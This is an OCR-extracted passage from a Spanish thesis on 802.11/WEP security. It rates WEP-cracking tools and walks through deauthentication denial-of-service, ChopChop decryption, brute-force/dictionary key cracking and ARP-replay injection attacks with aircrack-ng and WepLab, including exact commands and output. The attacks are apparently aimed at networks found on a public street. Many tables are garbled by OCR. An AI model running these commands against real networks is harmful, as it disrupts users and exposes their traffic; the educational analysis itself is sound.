Descripcion : Herramienta de analisis de seguridad WEP, que permite recuperar la clave de 
cifrado mediante la recoleccion de un numero muy alto de paquetes, usando ataques 
estadisticos. Actualmente no presenta revisiones de versiones. 

Total Peso : 28 3 



Caracteristica 


Factor 


Peso 


Resultado 


Documentacion 


1.3 


5 


6.5 


Cumple su cometido 


1.5 


5 


7.5 


Velocidad 


1.1 


1 


1.1 


Facilidad de uso 


1.1 


7 


7.7 


Ambito de distribucion 


1.1 


5 


5.5 



Tabla 5.3: AirSnort 

Nombre : WepAttack 

Descripcion : Herramienta de analisis de seguridad WEP, que permite recuperar la clave de 
cifrado mediante ataque de diccionario. 

Total Peso : 19.8 
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Caracteristica 


Factor 


Peso 


Resultado 


Documentacion 


1.3 


1 


1.3 


Cumple su cometido 


1.5 


5 


7.5 


Velocidad 


1.1 


1 


1.1 


Facilidad de uso 


1.1 


7 


7.7 


Ambito de distribucion 


1.1 


2 


2.2 



Tab la 5.4: Wep Attack 



Nombre : WEPCrack 

Descripcion : Herramienta de analisis de seguridad WEP, que permite recuperar la clave de 
cifrado mediante ataque estadistico. Fue la primera implementacion de ataques de tipo 
estadistico. Hoy en dia esta en desuso. 

Total Peso : 19.5 



Caracteristica 


Factor 


Peso 


Resultado 


Documentacion 


1.3 


3 


3,9 


Cumple su cometido 


1.5 


5 


3,5 


Velocidad 


1.1 


2 


2,2 


Facilidad de uso 


1.1 


5 


5,5 


Ambito de distribucion 


1.1 


4 


4,4 



Tabla 5.5: WEPCrack 

Nombre : WepLab 

Descripcion : Herramienta de analisis de seguridad WEP, que permite recuperar la clave de 
cifrado mediante ataque de diccionario, fuerza bruta o haciendo uso de metodos estadisticos . 

Total Peso : 43.6 
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Caracteristica 


Factor 


Peso 


Resultado 


Documentacion 


1.3 


6 


7,8 


Cumple su cometido 


1.5 


7 


10,5 


Velocidad 


1.1 


7 


7,7 


Facilidad de uso 


1.1 


9 


9,9 


Ambito de distribucion 


1.1 


7 


7,7 



Tabla 5. 6: WepLab 

Nombre : Mdk3 

Description : Herramienta de analisis de seguridad WEP, que permite realizar ataques de 
denegacion de servicio tanto a WEP como a WPA . 

Total Peso : 31.4 



Caracteristica 


Factor 


Peso 


Resultado 


Documentacion 


1.3 


2 


2,6 


Cumple su cometido 


1.5 


6 


9 


Velocidad 


1.1 


6 


6,6 


Facilidad de uso 


1.1 


6 


6,6 


Ambito de distribucion 


1.1 


6 


6,6 



Tabla 5. 7: Mdk3 

Es conveniente resaltar el hecho de que las herramientas presentadas cumplen las 
funciones necesarias para llevar a la practica los estudios teoricos presentados. Asi pues es 
necesario seleccionar para cada debilidad presentada la herramienta adecuada. Con este 
objetivo se presenta la tabla siguiente, que define la eleccion de la aplicacion teniendo en 
cuanta los resultados del analisis de pesos y la funcionalidad que se pretende utilizar. 
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Aplicacion/ 
Ataque 


Estadisticos 


Induction 


DoS 


Diccionario/ 
Fuerza bruta 


Autenticacion 


Inyeccion 


Aircrack(53.8) 


X 


X 


X 




X 


X 


AirSnort (28.3) 


X 












WEPAtacck(19.8) 








X 






WEPCrack(19.5) 


X 












WepLab (43.6) 


X 






X 




X 


Mdk3 (31.4) 






X 






X 



Tabla 5.8: Comparative! de herramientas 



De la tabla anterior se extraen los siguientes resultados. 

• Aplicacion seleccionada para ataque estadistico fue Aircrack 

• Aplicacion seleccionada para ataques inductivos fue Aircrack 

• Aplicacion seleccionada para ataques de DoS fue Aircrack 

• Aplicacion seleccionada para ataques de Diccionario/ Fuerza Bruta fue 
WepLab 

• Aplicacion seleccionada para ataques de Inyeccion fue Aircrack 

• Aplicacion seleccionada para ataques de autenticacion fue Aircrack 



5. 1 .2.3 Maqueta hardware utilizada para la prueba 

Tras la seleccion de las herramientas software a utilizar para el test, es necesario 
establecer el conjunto de recursos hardware utilizados para la prueba tecnica. La seleccion de 
la electronica de red asi como del computador es inmediata puesto que no es imprescindible 
para la prueba ningun elemento que requiera particularidades tecnicas. De este modo podemos 
distinguir dos elementos hardware principalmente que a continuacion se detallan. 
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Ordenador Portatil NEC 

o Intel Centrino 1.5 Ghz 

o 512 Mb de memoria RAM 

o Sistema operativo Backtrack 3 (Live linux) 

o Slot PCMCIA 
Ordenador Portatil HP 

o AMD Turio 64 x2 

o 512 Mb de memoria RAM 

o Sistema operativo Backtrack 3 (Live linux) 
Tarjeta de red inalambrica SMC WCBT-G 

o Velocidad de transmision 108 Mbits 

o Slot PCMCIA 

o Chipset Atheros 

o Drivers Aterhos Madwifi cvs 2005-10-25 
Tarjeta inalambrica Conceptronic 54G 

o Velocidad de transmision 54 Mbits 

o Chipset RT2500 
Tarjeta inalambrica Broadcom integrada 

o Velocidad de transmision 54 Mbits 
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o Chipset Broadcom BCM943 1 1 MCG 

Tarjeta inalambrica Intel centrino integrada 

o Velocidad de transmision 54 Mbits 

o Chipset Centrino IPW2200 



5.1.2.4 ESCENARIO 

Tras la definicion del material utilizado para la prueba, el escenario seleccionado para 
el test de vulnerabilidades fue una centrica calle de la ciudad de Valencia elegida de forma 
aleatoria. La eleccion de la fecha y la hora del test influian en cuanto al trafico existente en el 
medio. Asi pues las diversas pruebas fueron escogidas entre una serie de dias comprendidos 
de Lunes a Viernes y en un horario de oficina. Esto nos permitio obtener un mayor volumen 
de trafico y actividad en las diferentes redes utilizadas para la prueba. A continuacion se 
muestra la localizacion del escenario propuesto. 
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Figura 5.8: Localization del escenario 



El resaltado de color indica la localization utilizada para las pruebas. 



5.1.2.5 PRUEBA PRACTICA ATA QUE DE DENEGACION DE SERVICIO/AUTENTICACION. 

• Objetivo: Conseguir que una estacion asociada al punto de acceso deje de 
estarlo, produciendo una denegacion de servicio en cuanto a la utilization de 
los recursos del AP. 

• Objetivo secundario: Capturar la cadena de cifrado utilizada para la 
autenticacion, en forma de archivo ".xor". 

• Herramientas: Aircrack Suite (Aireplay ataque 0, denegacion de servicio y 
Airodump para capturar los paquetes). Tarjeta inalambrica Broadcom. 
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• Victima: Estacion con direccion "00: 80: 5 A: 34" asociada al AP con MAC 
"00: 14:BF:BA" y ESSID 3com 

• Metodologia: 

1. Poner el interfaz inalambrico en modo monitor, esto se realiza de forma 
automatica al lanzar el Airodump. 

2. Detectar la estacion objetivo en la lista mostrada por el Airodump 

3. Abrir otro terminal y lanzar la aplicacion Aireplay en el modo de ataque 

4. Observar como la estacion atacada deja de transmitir informacion, este 
resultado pude observarse en el Airodump. 

En primer lugar destacar que por motivos de seguridad y privacidad han sido 
eliminados los dos ultimos bytes de las direcciones MAC de las siguientes y posteriores 
capturas realizadas, asi pues tan solo se mostrara los tres primeros bytes correspondientes al 
OUI y el primer byte que identifica univocamente a la tarjeta inalambrica. 

Localizar el objetivo 

Recordemos que el objetivo del ataque de denegacion de servicio que pretendemos 
demostrar consiste en impedir que el cliente que utiliza la red inalambrica sea incapaz de 
establecer una comunicacion continuada con el punto de acceso. De esta forma pondremos en 
funcionamiento la aplicacion perteneciente a la Suite Aircrack Airodump, mediante las 
siguientes lineas. 

airodump ethl -channel 7 -w DoS.cap 



1 OUI "Organizationally Universal Identifier" Identificador universal de la organizacion desarrolladora del hardware. 
Consiste en un identificador univoco de 24 bits. 
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Esta herramienta nos permite capturar todo el trafico que circula por el medio de 
radiofrecuencia en un determinado canal (el 7 en este caso), utilizando la interfaz "ethl" y 
obteniendo como resultado un archivo de captura "Dos. cap". 

A continuacion la aplicacion analizara todo el trafico del canal escogido mostrando un 
resumen como el de la figura siguiente. 



CH 7 ] [ Elapsed: 


15 S ] [ 2007- 12-22 


15:53 




BSSID 


PWR RXO 


Beacons 


#Data, #/s 


CH NB ENC CIPHER AUTH ESSID 


O0:13:F7:28: 


74 


111 





5 54. WEP WEP SMC 


00:14:BF:BA: 


96 


159 


8 


7 4S WEP WEP 3com 


BSSID 


STATION 




PWR Rate 


Lost Packets Probes 



Figura 5.9: Resumen trafico del canal 



La parte superior de la figura muestra la fecha de la captura y el canal elegido, asi 
como el tiempo que ha transcurrido desde la ejecucion de la aplicacion. A continuacion se 
listan las direcciones MAC de los puntos de acceso encontrados con sus detalles asociados: 

• PWR : Potencia de la senal. 

• RXQ : Tasa transmision/recepcion. 

• Beacons : Paquetes de anuncio capturados. 

• #Data : Paquetes de datos capturados. 

• #/s : Tasa de transmision de paquetes. 

• CH : Canal del AP (Observese como el solapamiento de canales en 802.11 



113 de200 



Roberto Amado Gimenez 
06/03/2008 



m 



Escola Tecnica Superior D'Enginyeria 



Analisis De La Seguridad En Redes 802.11 




hace que se capture informacion de canales contiguos). 

• MB : Velocidad del AP 

• ENC : Encriptacion utilizada. 

• CIPHER : Cifrado utilizado. 

• AUTH : Tipo de autenticacion. 

• ESSK) : Nombre del conjunto de servicios. 

En la parte inferior de la captura se listan el conjunto de estaciones asociadas a cada 
punto de acceso. En este caso la lista permanece vacia ya que la captura ha sido lanzada hace 
escasos segundos. 



Pasados unos minutos la captura avanza mostrando los resultados de la siguiente 



figura. 



CH 7 ] [ Elapsed: 


3 mins J [ 


2007-12- 


22 16:00 ] [ 140 bytes 


keystream: 00:14:BF:BA: 


BSSID 


PWR RXQ 


Beacons 


#Data, #/s 


CH 


MB 


ENC 


CIPHER AUTH 


ESSIQ 


00:13:F7:28: 
00:14:BF:BA: 
00:02:CF:53: 
00:13:10:7A: 




100 



-1 




1521 
2195 

7 




207 

113 



19 


6 

7 
9 

7 


54. 
48 
54. 
-1 


WEP 
WEP 
WEP 
WEP 


WEP 

WEP SKA 

WEP 

WEP 


SHC 
3com 
WLAN_A3 
<length: 


BSSID 


STATION 






PWR Rate 


Lost 


Packets 


Probes 




00:14:BF:BA: 
(not associated) 
(not associated) 
(not associated) 


00:80:5A:34: 
00:18:DE:A9: 
00:13:F7:08: 
00:02:5F:3F: 




0-0 
0-0 
0-0 
0-0 


U 

97 








587 
2 
3 


y aYxnVBEP 1 
Jazztel Wi 
WLAN BO 


U.NAIU68B7 
r el ess 


12 


WLAN 37 



Figura 5.10: Resultados de la captura 



Como comentamos anteriormente el objetivo es que la estacion con direccion MAC 
"00:80:5A:34" asociada al punto de acceso "00:14:BF:BA" (ESSID 3com), deje de estarlo 
imposibilitando toda comunicacion con la red. En la parte inferior de la captura observamos 
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como la estacion victima pasados 3 minutos ha transmitido 587 paquetes por el medio. 

Lanzando el ataque 

En este momento se dispone a realizar un envio masivo de paquetes de 
deautenticacion por parte de la estacion atacante mediante la herramienta Aireplay, 
consiguiendo que el cliente asociado deje de estarlo. Esta accion produce como consecuencia 
la desasociacion completa del punto de acceso de la estacion licita. Para lanzar el ataque se 
ejecuta la sentencia de Aireplay siguiente: 



aireplay -0 -a 00:14:BF:BA -c 00:80:5A:34 ethl 



Donde aireplay es la llamada a la aplicacion indicando como parametros el tipo de 
ataque "-0", envio continuo de paquetes "0" y las direcciones MAC tanto del AP como del 
cliente a deutenticar. Por ultimo "ethl" representa la interfaz seleccionada para la inyeccion 
de los paquetes. Asi pues tras lanzar la denegacion de servicio la aplicacion Aireplay mostrara 
el siguiente resultado. 



bt ■ # aireplay-ng -0 30 -c OO:80:5A:34: -a 00:14:BF:BA: ethl 

16:08:41 Waiting for beacon frame (BSSID: O0:14:BF:BA: ) on channel 7 

16:08:41 Sending DeAuth to station -- STT-1AC : [00 : 80 :5A: 34: ] 



Figura 5.11: Resultado de la aplicacion Aireplay 



Obteniendo resultados 

Como se puede observar en la siguiente imagen, tras el ataque, la estacion cliente deja 
de transmitir tramas al AP, obteniendo los resultados que a continuacion, muestra la captura. 
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CH 7 ] [ Elapsed: 


5 mins ] [ 


2GG7-12- 


22 16:11 ] [ 148 bytes 


keystream: GG:14:BF:BA: 


BSSID 


PWR RXO 


Beacons 


#Data, #/s 


CH 


MB 


ENC 


CIPHER AUTH ESSID 


GG:13:F7:28: 


G 63 




2293 


299 G 


6 


54, 


WEP 


WEP 


SMC 


0G:14:BF:BA: 


G 10Q 




3261 


171 G 


7 


48 


WEP 


WEP SKA 


3com 


GG:G2:CF:63: 


G G 




14 


Q G 


9 


54. 


WEP 


WEP 


WLAN_A3 


Q0:13:1G:7A: 


-1 G 




G 


23 G 


7 


-1 


WEP 


WEP 


<length: 


BSSID 


STATION 






PWR Rate 


Lost 


Packets 


Probes 




(not associated ) 


GG:13:CE 


:C1: 




G G- G 


8 




9 


red_casa 




[not associated ) 


GG:18:DE:A9: 




G G- G 







4 


Jazztel Wireless | 


[not associated ) 
GG:13:1G:7A: 


GG:G2:6F 
GQ:8G:5A 


:3F: 
:39: 




G G- G 
G G- G 


G 






14 


WLAN_37 






74 





Figura 5.12: Salida del Airodump 

Efectivamente el cliente asociado ya no aparece en la lista inferior de la imagen es 
mas, la aplicacion Airodump informa que ha sido capturada con exito una cadena de cifrado 
de longitud 148 bytes (parte superior derecha de la imagen). La captura del keystream se ha 
producido al autenticarse en el punto de acceso la estacion con MAC "00: 80: 5 A: 34" por 
primera vez. 

Este tipo de ataques son posibles debido a que el estandar 802. 1 1 no contempla cifrado 
de datos para las tramas de gestion, de esta forma es posible inyectar en el medio paquetes de 
este tipo sin ningun repudio por parte de los elementos de la red. 

Cabe destacar que este ataque de denegacion de servicio no es debido a una carencia 
de seguridad en el protocolo WEP en si, sino que mas bien implicaria un fallo de diseno del 
propio estandar 802.11. El motivo por el cual se ha incluido en esta seccion es doble. En 
primer lugar este ataque es utilizado en primera instancia, para obligar a las estaciones a 
reautenticarse generando trafico ARP utilizado posteriormente para acelerar los ataques 
estadisticos. En segundo lugar como objetivo secundario se ha establecido la posibilidad de 
capturar la cadena de cifrado o keystream para un IV valido. Esta accion si que es 
consecuencia de un fallo en el diseno del protocolo WEP, ya que como se ha especificado en 
la seccion teorica, tras la desautenticacion de la estacion se vuelve a producir una negociacion 
de las claves. Dicho proceso de autenticacion es capturado por la aplicacion Airodump 
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obteniendo la cadena de cifrado. La imagen siguiente muestra la cadena mencionada en 
forma de archivo con extension ".xor". 



bt practica # [date) S& Is -Is 










Sat Dec 22 16:14:07 GMT 2007 










total 840 










4 -rwxrwxrwx 1 root root 152 Dec 


11 


16:12 autenticacion,cap-01- 


00-14-BF-BA- 


,xor* 


604 -rwxrwxrwx 1 root root 617922 Dec 


11 


16:12 autenticacion,cap-01, 


cap* 




4 -rwxrwxrwx 1 root root 1716 Dec 


11 


16:12 autenticacion,cap-01, 


txt* 




124 -rwxrwxrwx 1 root root 124170 Dec 


11 


16:11 deautentical.png* 






104 -rwxrwxrwx 1 root root 102855 Dec 


21 


15:54 Usta_ap.png* 






bt practica # | 











Figura 5.13: Archivo .xor 

De esta forma se ha conseguido el doble objetivo propuesto, impedir que una estacion 
transmita tramas utilizando el punto de acceso y obtener una cadena de cifrado valida. 

5.1.2.6 Prueba practica ata que Inductivo ChopChop. 

• Objetivo: Conseguir desencriptar un paquete de datos cifrado con la clave 
WEP utilizando el AP como elemento de prueba y error. 

• Objetivo secundario: Recuperar el keystream de un paquete de datos de la 
red, util para cifrar posteriormente cualquier paquete. 

• Herramientas: Aircrack Suite (Herramienta Aireplay ataque 4 tipo ChopChop 
y Airodump como aplicacion de captura de datos). Tarjeta inalambrica 
Broadcom. 

• Victima: Punto de acceso con MAC "00:14:BF:BA" y ESSE) 3com, paquete 
de datos aleatorio. 

• Metodologia: 

1. Establecer el objetivo mediante Airodump 

2. Lanzar el ataque con Aireplay en el modo 4 
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3. Obtener el Keystream y el paquete descifrado 




Estableciendo el objetivo 

Como se comento en la parte teorica, el ataque ChopChop puede recuperar el texto 
piano de un paquete cifrado con el protocolo de seguridad WEP utilizando el punto de acceso 
a modo de oraculo. Para ello utilizaremos nuevamente la Suite Aircrack y en concreto la 
aplicacion Aireplay en su modo numero 4 ChopChop. 

En primera instancia es necesario conocer que puntos de acceso estan ofreciendo sus 
servicio en el medio inalambrico, para ello lanzaremos la aplicacion Airodump mediante la 
siguiente sentencia. 



airodump ethl -channel 7 



En este momento detectamos que el punto de acceso con ESSID "3 com" esta 
emitiendo en el canal 7 y tiene como estacion asociada el cliente "00:14:A5:EA:". 



Elapsed: 


1 min ] [ 2007 


■12-22 


17:19 








PWR RXO Beacons 


#Data, #/s 


CH MB ENC 


CIPHER AUTH ESSIO 


:BA: 


100 


962 


78 


7 48 WEP 


WEP 3con 




STATION 




PWR Rate 


Lost Packets 


Probes 


:BA: 


0Q:14:A5:EA: 




0-0 


221 7043 




ociated) 


0Q:02:5F:3F: 




0-0 


2 


WLAN 37 


ociated) 


0O:8O:5A:39: 




0-0 


3 





Figura 5.14: Detection del cliente 

Como se puede observar en la imagen el AP ha transmitido 78 paquetes de datos desde 
que se inicio la captura. 
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Lanzando el ataque 

En este momento se procede a la ejecucion del ataque mediante la herramienta 
Aireplay de la siguiente forma. 



Aireplay -4 -h 00:14:A5:EA: raO 



En este momento la herramienta comienza a escuchar en el canal 7 paquetes de datos 
cifrados, en el momento en que es capturado uno se requiere la validacion por parte del 
usuario mostrando el siguiente resumen. 



t "* t aireplay-ng -4 -h 00:14:A5:Efl: raO 
The interface MAC (00:80:5A:34: ) doesn't natch the specified MAC (-h). 

ifconfig raO hw ether 00:14:A5:EA: 
.tead 12 packets ... 

Size: 78, FromDS: 1, ToDS: (UEP) 

BSSID = 00:14:.. 

Dest. MAC = 01:80:C2:00: 

Source MAC = 00:14:BF:BA: 

0x0000: 0842 0000 01P^ 



): 48c( 



0000 0014 bfba c0e3 £ 

bcOb 4500 9ce8 2cl7 P...E„. Jt 

H.25J .EtTay 



Use this packet 



Saving chosen packet in rep lay_src- 1222 -17 1823, cap 



Figura 5.15: Peticion de validacion de Aireplay 



La aplicacion informa de las direcciones tanto de origen como destino de los datos, asi 
como muestra el contenido del paquete cifrado. Tras la posterior confirmacion por parte del 
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usuario se lanza la inyeccion de paquetes. 

Para cada byte de datos cifrados, se genera mediante prueba y error, el byte de la 
cadena de cifrado y el byte del texto en claro, el proceso puede observarse en las columnas 
centrales de la captura siguiente. Cabe destacar que el proceso de descifrado es costoso en 
tiempo y no puede ser utilizado para descifrar en tiempo real el trafico de la red. Para el 
ejercicio propuesto se ha conseguido desencriptar un paquete de datos de 110 bytes en 21 
segundos obteniendo una tasa de 1,9 bytes por segundo. 
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Savins chosen packet in replay src- 1222 -17 1823. cap 
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( 02 done) | xt 


ip = A7 
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198 frames 
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Offset 


76 


( 22 done) | xt 


in = 4E 
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unitten 


in 
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Offset 


75 
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unitten 
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Offset 


74 
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uritten 


in 
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Offset 


73 


( 92 done) | xt 
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pt = A5 


140 frames 


uritten 


in 


419 ms 


Offset 


72 


(112 d 
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pt = A5 


173 frames 


unitten 


in 
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Offset 


71 


(13 


2 d 
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276 frames 


unitten 


in 
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Offset 


70 
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2 d 
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140 frames 


unitten 


in 


420 ms 


Offset 


69 


(182 done) xt 


ip = 7C 


pt = A5 


245 frames 


unitten 


in 


734 ms 


Offset 


68 


(202 done) xt 


jn = F4 


pt = A5 


175 frames 


unitten 


in 


526 ms 


Offset 


67 


(222 done) xt 


jn = 24 


pt = A5 


102 frames 


unitten 


in 


305 ms 


Offset 


66 


(252 done) xt 


jr = 37 
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105 frames 


unitten 


in 


315 ms 
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65 
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61 
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60 
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■ip = 6C 
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Figura 5.16: Ataque Chop Chop 
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Obteniendo resultados 



De esa forma se han conseguido los dos objetivos propuestos. Conseguir por una 
parte, el texto piano del paquete, volcado en el archivo "replay_dec- 1222-1 71 845. cap" en 
formato de captura de la libreria libcap ".cap". Mientras que por otra parte se ha conseguido 
determinar el keystream utilizado para cifrar dicho paquete de datos volcado al archivo 
"replay_dec-1222-171845.xor". En La imagen se puede apreciar el proceso de fragmentacion 
de cada byte de la trama cifrada mostrando los tiempos empleados para estimar cada octeto. 



5.1.2.7 PRUEBA PRACTICA ATA QUE DE DlCCIONARIO/FUERZA BRUTA. 

• Objetivo: Conseguir demostrar que es posible y existen herramientas que 
permiten recuperar la clave de cifrado mediante una accion reiterada de prueba 
y error haciendo uso de todas las posibles combinaciones de palabras. 

• Objetivo secundario: Reducir las palabras del lenguaje utilizadas para el 
ataque, utilizando para ello un diccionario de palabras. 

• Herramientas: Aplicacion WepLab en su modo de ataque de diccionario y 
fuerza bruta ( extension "-y" y extension "-b"). 

• Victima: Captura de informacion perteneciente al punto de acceso con 
direccion MAC "00:13:10:7A" con paquete de datos aleatorio. 

• Metodologia: 

1 . Capturar en el escenario de pruebas al menos un paquete de datos cifrados 
del AP o cliente objetivo mediante la aplicacion Airodump. 

2. Analizar mediante WebLab el contenido del paquete en busca del objetivo. 

3. Realizar ataque de diccionario o fuerza bruta a la captura de datos 

4. Obtener resultados 
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En esta demostracion practica de la susceptibilidad de un paquete de datos cifrado con 
WEP, a ser abordado mediante ataques iterativos de prueba y error, se va a utilizar una 
captura realizada en el escenario presentado en los puntos anteriores y elegida de forma 
totalmente aleatoria. Con ello pretendemos demostrar que es posible realizar ataques de fuerza 
bruta dirigidos contra tan solo, escasas capturas de datos de una red cifrada con WEP. En un 
principio estos ataques han quedado a un lado debido a la gran eficacia de los ataques 
estadisticos. De todas maneras por motivos educacionales se presenta a continuacion los 
siguientes estudios abordados. 



Capturando datos 

Como hemos mencionado anteriormente la herramienta utilizada para la prueba es la 
aplicacion WepLab que nos permite realizar tanto ataques de fuerza bruta como de 
diccionario, a las capturas realizadas en el escenario de pruebas. Esta seccion estudia ambos 
ataques al tratarse uno un subconjunto del otro. 

La captura de datos realizada en el escenario de pruebas se realizo mediante la 
aplicacion Airodump tomando de manera aleatoria el objetivo atacado. Destacar que 
metodologia de captura mediante Airodump es la realizada en ataques anteriores. 



Analizando la captura 

En primera instancia lanzaremos la aplicacion en su modo de analisis del paquete, este 
parametro permite listar el contenido de un paquete de datos cifrado con WEP mostrando las 
estadisticas de paquetes ordenados por punto de acceso. 



Weplab -a diccionario. cap 
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Mediante el uso del parametro "-a" indicamos a la herramienta que comience el 
analisis de la captura "diccionario.cap". El resultado de la ejecucion se muestra en la imagen 
siguiente. 



weplab -a diccionario . can 1 


weplab - 1 


Jep Key Cracker Uep Key Cracker (vO.1.5) . 




Jose Ignai 


-io Sanchez Martin - Topo[LB] <topolb@users.sourceforge.net> 




Statistii 


=s for packets that belong to [00 : 14 : BF : BA: ] 




- Total 


valid packets read: 2 13 




- Total 


packets read: 213 




- Total 


unique IV read: 213 




- Total 


truncated packets read: 




- Total 


non-data packets read: 




- Total 


FF checksum packets read: 




PRISHHEADER SHOULD — WOT — BE USED as there are 209 packets smaller than this 


: header 


Statistii 


;s for packets that belong to [00 : 13 : F7 : 28 : ] 




- Total 


valid packets read: 370 




- Total 


packets read: 370 




- Total 


unique IV read: 3 70 




- Total 


truncated packets read: 




- Total 


non-data packets read: 




- Total 


FF checksum packets read: 




PRISHHEAD] 


[R SHOULD — NOT — BE USED as there are 25 packets smaller than this 


header 


Statistii 


;s for packets that belong to [00 : 13 : 10:7A: ] 




- Total 


valid packets read: S3 




- Total 


packets read: 63 




- Total 


unique IV read: 63 




- Total 


truncated packets read: 




- Total 


non-data packets read: 




- Total 


FF checksum packets read: 




PRISHHEM)] 


:R SHOULD — WOT — BE USED as there are 24 packets smaller than this 


header 


Statistii 


;s for packets that do not belong to any BSSID (BSSID field was not 


detected) 


- Total 


valid packets read: 




- Total 


packets read: 8353 




- Total 


unique IV read: 




- Total 


truncated packets read: 




- Total 


non-data packets read: 8353 




- Total 


FF checksum packets read: 





Figura 5. 1 7: Salida del Weblab 



Observamos como WepLab ha encontrado cuatro clasificaciones de trafico, las 
referentes a tres puntos de acceso con MACs "00:14:BF:BA", "00: 13: 10: 7A" y 
"00:13:F7:28", ademas de un conjunto de paquetes que no estan vinculados a ningun BSSID. 
A su vez WepLab muestra las estadisticas asociadas a cada punto de acceso, numero de 
paquetes validos, IV leidos, paquetes de gestion, etc. 
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Ataque de fuerza bruta 



En este momento estamos en disposicion de seleccionar una captura de datos 
referente a un AP concreto, en nuestro caso y de manera aleatoria hemos elegido al punto de 
acceso con direccion MAC "00: 13: 10: 7A" como victima. En primera instancia lanzaremos un 
ataque de fuerza bruta mediante el parametro "-b" de WepLab. 



Weplab -b -bssid 00: 13: 10: 7A diccionario.cap 



Especificando el punto de acceso mediante "--bssid" y la captura de datos 
"diccionario.cap". De esta forma la aplicacion comienza a ejecutar reiteradas pruebas de 
diferentes claves, haciendo uso de combinaciones del alfabeto alfanumerico. 




Figura 5. 18: Ataque de Fuerza Bruta 

Como se puede observar la herramienta comienza el testeo de claves llegando a probar 
742572 en tan solo cinco segundos de ejecucion, obteniendo una tasa de 123762 claves por 
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segundo. Cabe destacar el hecho de que en esta ejecucion practica no se va a probar una 
ejecucion completa de la vulnerabilidad debido al tiempo estimado para realizarla. A su vez 
debido al exito en la recuperacion de la clave de cifrado de los ataques estadisticos que mas 
adelante seran probados, esta demostracion practica se limita a mostrar que existen 
herramientas y que es posible lanzar ataques de fuerza bruta contra paquetes de datos cifrados 
con WEP. 



Ataque de diccionario 

A su vez WepLab permite ejecutar ataques de diccionario especificando como fuente 
un archivo de texto o bien utilizar la entrada estandar para generar claves de prueba. En esta 
demostracion practica hemos creado un pequefio archivo de texto "dicc.txt" que sera pasado 
como parametro a la aplicacion Weplab para que sea utilizada como fuente de palabras clave. 
El contenido del archivo se muestra a continuacion. 

Contenido de dicc.txt: 

12345 
prueba 
password 
holas 



Asi pues lanzaremos WEPLab en su modo de ataque de diccionario mediante la 
siguiente instruccion. 



Weplab -y -wordfile dicc.txt -bssid 00: 13: 10:7A diccionario. cap 



Donde el parametro "-y -worfile" especifica el archivo de diccionario a utilizar contra 
el punto de acceso "00:13:10:7A" de la captura "diccionario. cap". Como resultado de la 
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ejecucion se puede observar lo siguiente. 



weplab -y — wordfile dicc.txt — bssid 00:13:10:7A: 


diccionario . c 


;ap 


weplab - Wep Key Cracker Wep Key Cracker (vO.1.5) . 






Jose Ignacio Sanchez Martin - Topo[LB] <topolb@ users. ; 


Bourcef orge . net; 




Total valid packets read: 50 






Total packets read: 8999 






Process number: ===> 4 keys tested [ s:"holas" 






Statistical cracking started! Please hit enter to get 


statistics froi 


n John. 


Weplab statistics will be printed each 5 seconds 






This was the end of the dictionnary attack. 







Figura 5. 19: Ataque de Diccionario 



Obteniendo resultados 

WepLab ha probado las cuatro claves que se encontraban en el fichero "dicc.txt" sin 
exito. Como ya se ha comentado anteriormente el proposito de esta demostracion practica es 
establecer que es posible y existen herramientas que permite explotar estas vulnerabilidades, 
haciendo nuevamente mencion al uso de ataques estadisticos en detrimento y relegando a usos 
educacionales, los ataques de fuerza bruta y diccionario. 

De esta manera hemos conseguido demostrar el doble objetivo propuesto, es decir 
existen aplicaciones que podrian permitir la recuperacion de la clave de cifrado mediante el 
uso de fuerza bruta o un diccionario de palabras como fuente de datos. 



5.1.2.8 Prueba practica ataque de myeccion. 



Objetivo: Conseguir inyectar trafico valido en la red sin conocer la clave de 
cifrado. 

Objetivo secundario: Incrementar de forma masiva el trafico de la red con el 
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objetivo de capturar gran cantidad de paquetes cifrados con distintos IV's. 

Herramientas: Aplicacion Aireplay y Airodump perteneciente a la Suite 
Aircrack. La primera en su "ataque 3 inyeccion" se utilizara para la inyeccion 
de trafico, mientras que la segunda sera usada para capturar las replicas. 
Tarjeta inalambrica RT2500. 

Victima: Captura de informacion perteneciente al punto de acceso con ESSID 
"3 com" escogida de forma aleatoria. 

Metodologia: 

1. Determinar el objetivo mediante la aplicacion Airodump. Esta herramienta 
nos servira ademas para capturar el trafico generado en la red. 

2. Lanzar el ataque de reinyeccion mediante la aplicacion Aireplay en su 
modo 3. 

3. Obtener el resultado de la captura de datos mediante Airodump. 



Determinar el objetivo 

Como ya se explico en la seccion teorica de esta debilidad, es posible forjar o capturar 
cierto trafico de red que nos permita inyectar paquetes en el medio sin conocer la clave de 
cifrado. Bastara pues con la cadena de cifrado o una captura de un paquete ARP encriptado 
para obtener gran volumen de trafico en la red. Asi pues se abordara la opcion de tratar de 
capturar un paquete ARP permaneciendo a la escucha en el canal de RF que emite el punto de 
acceso victima, para su posterior reinyeccion. De esta forma cumpliendo el objetivo principal 
de esta practica automaticamente se vera cumplido el objetivo secundario. Veamos como 
conseguir ambos mediante el uso de las herramientas de la suite Aircrack . 

En primera instancia lanzaremos el sniffer de red inalambrica Airodump en el canal 
del punto de acceso, en este caso el 1 0, mediante la siguiente instruccion. 



Roberto Amado Gimenez 
128 de 200 06/03/2008 



[p*] 



Escola Tecnica Superior D'Enginyeria 



Analisis De La Seguridad En Redes 802.11 



Airodump -channel 10 -w inyeccion.cap raO 




Obteniendo como resultado la siguiente captura. 



CH 10 ] [ Eli 


psed: 


4 s ] [ 2007- 12-29 


12:49 


BSSID 






PWR RXQ Beacons 


#Data, #/s CH HB ENC CIPHER AUTH ESSID 


S0:14:BF:BA- 






1O0 67 


3 10 48 WEP WEP 3COIH 


BSSID 






STATION 


PWR Rate Lost Packets Probes 


00:14:BF:BA 






O0:13:F7:O2: 


-10-0 1 



10. 



Figura 5.20: Resultados del Aire dump 

Observamos como la estacion con ESSID "3 com" esta emitiendo en el canal numero 

Inyectando trafico 

A continuacion es lanzada la aplicacion Aireplay la cual permite tanto escuchar en el 
medio la transmision de un paquete ARP como la posterior reinyeccion automatica del 
mismo. 



Aireplay -3 -b 00:14:BF:BA -h 00:13:F7:02 raO 



Como parametro a la aplicacion se establece el punto de acceso "-b" y la direccion de 
la estacion que emite los paquetes "-h". Cabe destacar que para una correcta inyeccion de 
paquetes es necesario que la estacion emisora este asociada con el AP, puesto que el equipo 
con direccion "00:13:10:7A" lo esta (parte inferior de la captura), nuestra estacion suplantara 
su identidad mediante el paso del parametro "-h 00:13:F7:02". La imagen siguiente muestra el 
resultado de la accion. 
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bt - # aireplay-ng -3 -b 00:14:BF:BA -h 00:13:F7:02: raO 

